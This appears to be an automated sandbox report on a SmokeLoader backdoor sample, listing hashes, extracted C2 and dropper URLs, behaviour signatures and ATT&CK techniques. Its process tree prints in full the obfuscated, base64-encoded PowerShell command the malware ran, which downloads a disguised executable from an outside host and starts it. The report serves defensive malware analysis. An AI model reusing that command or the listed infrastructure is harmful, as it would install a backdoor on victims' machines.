smokeloader | c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da

General

Target

2c2cb2aa0782874d3c14cdd6f063f979.exe
Size

847KB
MD5

2c2cb2aa0782874d3c14cdd6f063f979
SHA1

583c43ca939f9d8a4eea53a7d71157ac3571a350
SHA256

c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da
SHA512

34c35989b80841ce09672856ad8c52475a2fa96da1004a61d2417241a25c12e108439f1c7e4851f125ea6af412e96487da793213f63feebb5ffed8f3a97c9d26

Score

10^/10

smokeloader backdoor trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://u.teknik.io/bHrgG.jpg

Extracted

Family

smokeloader

Version

2018

C2

http://94.140.114.59/1/

rc4.i32

Signatures

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 1984 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

nTvWNOa.exe

pid process

564 nTvWNOa.exe
Loads dropped DLL 2 IoCs

Processes:

powershell.exe

pid process

1984 powershell.exe
1984 powershell.exe

flow	pid	process
7	1984	powershell.exe

pid	process
564	nTvWNOa.exe

pid	process
1984	powershell.exe
1984	powershell.exe

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

nTvWNOa.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	nTvWNOa.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	nTvWNOa.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

1168 powershell.exe
1168 powershell.exe
1984 powershell.exe
1984 powershell.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

nTvWNOa.exe

pid process

564 nTvWNOa.exe
564 nTvWNOa.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1168 powershell.exe
Token: SeDebugPrivilege 1984 powershell.exe

pid	process
1168	powershell.exe
1168	powershell.exe
1984	powershell.exe
1984	powershell.exe

pid	process
564	nTvWNOa.exe
564	nTvWNOa.exe

description	pid	process
Token: SeDebugPrivilege	1168	powershell.exe
Token: SeDebugPrivilege	1984	powershell.exe

Suspicious use of FindShellTrayWindow 14 IoCs

Processes:

2c2cb2aa0782874d3c14cdd6f063f979.exe

pid	process
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe

Suspicious use of SendNotifyMessage 14 IoCs

Processes:

2c2cb2aa0782874d3c14cdd6f063f979.exe

pid	process
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe
1844	2c2cb2aa0782874d3c14cdd6f063f979.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

2c2cb2aa0782874d3c14cdd6f063f979.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1844 wrote to memory of 1168	1844	2c2cb2aa0782874d3c14cdd6f063f979.exe	powershell.exe
PID 1844 wrote to memory of 1168	1844	2c2cb2aa0782874d3c14cdd6f063f979.exe	powershell.exe
PID 1844 wrote to memory of 1168	1844	2c2cb2aa0782874d3c14cdd6f063f979.exe	powershell.exe
PID 1844 wrote to memory of 1168	1844	2c2cb2aa0782874d3c14cdd6f063f979.exe	powershell.exe
PID 1168 wrote to memory of 1984	1168	powershell.exe	powershell.exe
PID 1168 wrote to memory of 1984	1168	powershell.exe	powershell.exe
PID 1168 wrote to memory of 1984	1168	powershell.exe	powershell.exe
PID 1168 wrote to memory of 1984	1168	powershell.exe	powershell.exe
PID 1984 wrote to memory of 564	1984	powershell.exe	nTvWNOa.exe
PID 1984 wrote to memory of 564	1984	powershell.exe	nTvWNOa.exe
PID 1984 wrote to memory of 564	1984	powershell.exe	nTvWNOa.exe
PID 1984 wrote to memory of 564	1984	powershell.exe	nTvWNOa.exe

C:\Users\Admin\AppData\Local\Temp\2c2cb2aa0782874d3c14cdd6f063f979.exe
"C:\Users\Admin\AppData\Local\Temp\2c2cb2aa0782874d3c14cdd6f063f979.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1844

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1168

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1984

C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
"C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe"
4⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious behavior: MapViewOfSection
PID:564

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
MD5
3cf58ec9de521b32015552ca3024d1cd

SHA1
539236ecd9d859f82f89311bfd564906aa98451e

SHA256
ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace

SHA512
25d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
33cbe4abdd98e8568a78a65452917a7f

SHA1
4f139a955bbd59bd537e3f3975344e9a41b9002e

SHA256
55e816aa4a62bd5803930e2b9055412bdb8a873c77c2bfa3591cd25e06514eb7

SHA512
290ab389a1fe0967cf23c6a6bd340797be70657257005f2c80a3f791db323e3fd966221ead30e5deb89e6a85f44052515bf878c7e170a6f715541ca32129a347

Download Submit
\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
MD5
3cf58ec9de521b32015552ca3024d1cd

SHA1
539236ecd9d859f82f89311bfd564906aa98451e

SHA256
ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace

SHA512
25d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599

Download Submit
\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
MD5
3cf58ec9de521b32015552ca3024d1cd

SHA1
539236ecd9d859f82f89311bfd564906aa98451e

SHA256
ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace

SHA512
25d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599

Download Submit
memory/564-97-0x0000000000000000-mapping.dmp

Download
memory/1168-66-0x00000000020D0000-0x00000000020D1000-memory.dmp

Filesize
4KB

Download
memory/1168-64-0x0000000004960000-0x0000000004961000-memory.dmp

Filesize
4KB

Download
memory/1168-67-0x0000000002750000-0x0000000002751000-memory.dmp

Filesize
4KB

Download
memory/1168-65-0x0000000004962000-0x0000000004963000-memory.dmp

Filesize
4KB

Download
memory/1168-60-0x0000000000000000-mapping.dmp

Download
memory/1168-62-0x00000000009B0000-0x00000000009B1000-memory.dmp

Filesize
4KB

Download
memory/1168-63-0x00000000049A0000-0x00000000049A1000-memory.dmp

Filesize
4KB

Download
memory/1224-101-0x0000000003960000-0x0000000003975000-memory.dmp

Filesize
84KB

Download
memory/1224-100-0x0000000003980000-0x0000000003981000-memory.dmp

Filesize
4KB

Download
memory/1844-59-0x0000000076A81000-0x0000000076A83000-memory.dmp

Filesize
8KB

Download
memory/1984-75-0x0000000004930000-0x0000000004931000-memory.dmp

Filesize
4KB

Download
memory/1984-93-0x00000000062E0000-0x00000000062E1000-memory.dmp

Filesize
4KB

Download
memory/1984-94-0x0000000006370000-0x0000000006371000-memory.dmp

Filesize
4KB

Download
memory/1984-86-0x0000000005820000-0x0000000005821000-memory.dmp

Filesize
4KB

Download
memory/1984-85-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1984-84-0x0000000005770000-0x0000000005771000-memory.dmp

Filesize
4KB

Download
memory/1984-79-0x0000000005700000-0x0000000005701000-memory.dmp

Filesize
4KB

Download
memory/1984-76-0x0000000004932000-0x0000000004933000-memory.dmp

Filesize
4KB

Download
memory/1984-68-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads